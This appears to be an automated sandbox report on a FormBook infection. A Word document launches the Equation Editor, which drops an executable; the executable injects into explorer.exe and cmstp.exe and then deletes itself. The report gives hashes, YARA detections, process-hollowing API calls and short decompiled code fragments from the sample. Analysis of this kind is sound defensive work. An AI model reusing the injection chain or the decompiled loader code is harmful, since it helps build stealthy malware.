                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: WINWORD.EXE PID: 1516 Parent PID: 596

                                                            General

                                                            Start time:18:08:15
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f150000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: EQNEDT32.EXE PID: 2812 Parent PID: 596

                                                            General

                                                            Start time:18:08:17
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: ashlkyvc7592.exe PID: 1528 Parent PID: 2812

                                                            General

                                                            Start time:18:08:24
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: ashlkyvc7592.exe PID: 836 Parent PID: 1528

                                                            General

                                                            Start time:18:08:25
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 836

                                                            General

                                                            Start time:18:08:28
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: cmstp.exe PID: 2580 Parent PID: 1764

                                                            General

                                                            Start time:18:08:41
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmstp.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                            Imagebase:0x110000
                                                            File size:84992 bytes
                                                            MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: cmd.exe PID: 2176 Parent PID: 2580

                                                            General

                                                            Start time:18:08:45
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
                                                            Imagebase:0x4aac0000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Analysis Process: ashlkyvc7592.exe PID: 1528 Parent PID: 2812 ashlkyvc7592.exeCOMMON

                                                              Executed Functions

                                                              Function 0034C550, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0034C817
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 843507742a960c52944b326c32fcbb1d44fc7abc046a031122ede07c7ebcc82d
                                                              • Instruction ID: 4569ef839115763fc76bdd746f1b578f51aec4ceb52f574a642949c846c75f86
                                                              • Opcode Fuzzy Hash: 843507742a960c52944b326c32fcbb1d44fc7abc046a031122ede07c7ebcc82d
                                                              • Instruction Fuzzy Hash: 5EC13470D1121D8FDB61CFA4C841BEEBBB1BF09304F04A5A9D859BB240DB74AA85CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0034C1B8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0034C28B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: d18917667ace8822144b418efa6f6447f78cad2fc7bd6d4205f5b9fecb047b17
                                                              • Instruction ID: 9e91db1f1bfb3e77c8e173d6e6073ee85f29e95b5c5a35736d273626c354c5e9
                                                              • Opcode Fuzzy Hash: d18917667ace8822144b418efa6f6447f78cad2fc7bd6d4205f5b9fecb047b17
                                                              • Instruction Fuzzy Hash: 6A4197B4D012589FCF00CFE9D984AEEBBF5BB49314F24942AE815BB200D775AA45CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0034C318, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0034C3CA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 15899a0f928df8b89342572b7ef571dfb17c04ae49376c99a2f0fd871de929cb
                                                              • Instruction ID: 1b184dbdb7ffd38a79cdcf466be047d6898168f9bec09b5128e4f9e443f9bccd
                                                              • Opcode Fuzzy Hash: 15899a0f928df8b89342572b7ef571dfb17c04ae49376c99a2f0fd871de929cb
                                                              • Instruction Fuzzy Hash: 6541A8B9D002589FCF00CFA9E884AEEFBB5BB49314F10A42AE815B7200D775A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0034C090, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0034C13A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 651baace1f749580f98e80fbe619c51c543671acabec68a765a249302fd6a6ef
                                                              • Instruction ID: 09961ddf38deee24a4703c322b348729e569c62a08eb8d475dd16c127752eeee
                                                              • Opcode Fuzzy Hash: 651baace1f749580f98e80fbe619c51c543671acabec68a765a249302fd6a6ef
                                                              • Instruction Fuzzy Hash: 8D41A8B8D012589BCF10CFA9D884ADEFBB5FB49314F10A42AE815BB300D735A952CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0034BF60, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0034C00F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: fdbf00b93dfa0e737c878d62cd45b4768bcce38fd638ca94ffa118482ffaf7b3
                                                              • Instruction ID: 8affdab45fc00f792c9adb8a07a1c1eca58d762b2e9f6860c8f71b474eeb2da6
                                                              • Opcode Fuzzy Hash: fdbf00b93dfa0e737c878d62cd45b4768bcce38fd638ca94ffa118482ffaf7b3
                                                              • Instruction Fuzzy Hash: 2641BBB4D012189FCB10CFA9D884AEEFBF5BB49314F24942AE415BB240D779AA85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0034BE70, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0034BEEE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 45a80b09ed0867e574e388c27c6b0b6d4cfd800bcac205c05fda30e256e9a40f
                                                              • Instruction ID: 69f1017d35b1672dfb7de12ffa76cc7eab25285b3b6ebd102f524a9dc8047b75
                                                              • Opcode Fuzzy Hash: 45a80b09ed0867e574e388c27c6b0b6d4cfd800bcac205c05fda30e256e9a40f
                                                              • Instruction Fuzzy Hash: 8631A9B8D012189FCB10CFA9E884ADEFBB5FB49314F14942AE815B7300D775A945CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002DD01C, Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424813710.00000000002DD000.00000040.00000001.sdmp, Offset: 002DD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8e1838c6ea9074b40bf0836dfdd49df0fa39e4b20b044e884e42489f384b330
                                                              • Instruction ID: 8238bf593aee1653814385879d7765b5dfc5d8a5145a36381cf43423ce75eb35
                                                              • Opcode Fuzzy Hash: b8e1838c6ea9074b40bf0836dfdd49df0fa39e4b20b044e884e42489f384b330
                                                              • Instruction Fuzzy Hash: A8213474614604DFCB14CF20E884B16BB65EBC8315F24C9AAD80A4B346C337DC67CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002DD006, Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424813710.00000000002DD000.00000040.00000001.sdmp, Offset: 002DD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52b5efcbece997ef977c343527f6738173df5995d75bcad69647382a91fcb44a
                                                              • Instruction ID: 6559a19accba171f618a2e482bc49005025e8ae656d433de26c820983feaa7d5
                                                              • Opcode Fuzzy Hash: 52b5efcbece997ef977c343527f6738173df5995d75bcad69647382a91fcb44a
                                                              • Instruction Fuzzy Hash: E3219D755087808FCB12CF24D994B15BF71EB86314F28C5EBD8498B697C33AD81ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002CD1C1, Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424802504.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e605ee5cb0c030dfc8abcf21740a385de09661d4966b8b1daa1ad2ef4408a2b4
                                                              • Instruction ID: 7d56df25343fe986bcf7a541764cea0e1127f50b0cdc5298091978a886083f9a
                                                              • Opcode Fuzzy Hash: e605ee5cb0c030dfc8abcf21740a385de09661d4966b8b1daa1ad2ef4408a2b4
                                                              • Instruction Fuzzy Hash: C30184714147449AE7208E65DC88FA7BFDCEF51724F18856EED091A283C3B5D850D6B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002CD1C0, Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424802504.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93dcdf60394e90d289676cf4ddcd0e419b79ac74d06a59b17dd53486b6e128b9
                                                              • Instruction ID: 6534ffcd66a0a812572063be209cbe2a937cee93b7fe149ae7eff2d416366e81
                                                              • Opcode Fuzzy Hash: 93dcdf60394e90d289676cf4ddcd0e419b79ac74d06a59b17dd53486b6e128b9
                                                              • Instruction Fuzzy Hash: E1F04F72404644ABE7208E15D888B62FFD8EB91734F28C56AED085A287C279AC44CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 003458E6, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @2(m
                                                              • API String ID: 0-4091610512
                                                              • Opcode ID: d4123807c7c1a80979a81887240b73c0af540e577d3e0ca9c854a41d96db8f50
                                                              • Instruction ID: 75997839ae355cd4e36e9769697db99d99467512718b696167a9493054af4b2b
                                                              • Opcode Fuzzy Hash: d4123807c7c1a80979a81887240b73c0af540e577d3e0ca9c854a41d96db8f50
                                                              • Instruction Fuzzy Hash: 2E513070E111098FDB44EFB9E854AEDBBF6AB84304F10C93AD0249B369DB705945DF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 003458F0, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @2(m
                                                              • API String ID: 0-4091610512
                                                              • Opcode ID: 5ccf719bbe4417a9fcbd45e4598768e18ea156cf23dae2c63ffea0e0c8ea21f6
                                                              • Instruction ID: 6dc32d464fc2b024fdbe49150b48d94f61f4d0a21b12eafb69a83ca3da9e2068
                                                              • Opcode Fuzzy Hash: 5ccf719bbe4417a9fcbd45e4598768e18ea156cf23dae2c63ffea0e0c8ea21f6
                                                              • Instruction Fuzzy Hash: 43514F70E112098FDB44EFB9E854AEDBBF6AB88304F10C93AD0249B368DB705945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0006A2A9, Relevance: .9, Instructions: 896COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424426586.0000000000062000.00000020.00020000.sdmp, Offset: 00060000, based on PE: true
                                                              • Associated: 00000004.00000002.424408556.0000000000060000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.424772643.00000000000EA000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction ID: 37f826cd9b7f9087f7635e3da95cb0a65ea747eae0a82338e1f1ebb6a58d0175
                                                              • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction Fuzzy Hash: BB62686144F7C19FC7535B746DB46E2BFB1AE6321871E44CBD4C0CE0A3E22A195ADB22
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: ashlkyvc7592.exe PID: 836 Parent PID: 1528 ashlkyvc7592.exeCOMMON

                                                              Executed Functions

                                                              Function 00146F06, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 482nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL ref: 0014706F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461677386.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID: 0
                                                              • API String ID: 1778838933-4108050209
                                                              • Opcode ID: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
                                                              • Instruction ID: 253bf68096161b553a6d2928e6edfc7f5ca839ea7ece772036e2f0177ce9be5a
                                                              • Opcode Fuzzy Hash: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
                                                              • Instruction Fuzzy Hash: 14F14F70518A8D8FDBA9EF68C885AEEB7E0FF98305F40462EE44AD7251DF349641CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                              0x00418683
                                                              0x0041868f
                                                              0x00418697
                                                              0x0041869c
                                                              0x004186a2
                                                              0x004186bd
                                                              0x004186c5
                                                              0x004186c9

                                                              APIs
                                                              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: !:A$b=A$b=A
                                                              • API String ID: 2738559852-704622139
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00146F12, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL ref: 0014706F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461677386.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID: 0
                                                              • API String ID: 1778838933-4108050209
                                                              • Opcode ID: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
                                                              • Instruction ID: 64eae806efd05bcb1902572744705b75ac4fcfe72e3c87265f7bf0ec0de19c42
                                                              • Opcode Fuzzy Hash: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
                                                              • Instruction Fuzzy Hash: 99511C70918A8C8FDB69EF68C8846EEBBF4FB98305F40462EA44AD7251DF309645CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                              0x00409b4c
                                                              0x00409b4f
                                                              0x00409b54
                                                              0x00409b59
                                                              0x00409b63
                                                              0x00409b68
                                                              0x00409b6b
                                                              0x00409b6d
                                                              0x00409b75
                                                              0x00409b7a
                                                              0x00409b7a
                                                              0x00409b81
                                                              0x00409b89
                                                              0x00409b8c
                                                              0x00409b8e
                                                              0x00409ba2
                                                              0x00000000
                                                              0x00409ba4
                                                              0x00409baa
                                                              0x00409b5e
                                                              0x00409b5e
                                                              0x00409b5e

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

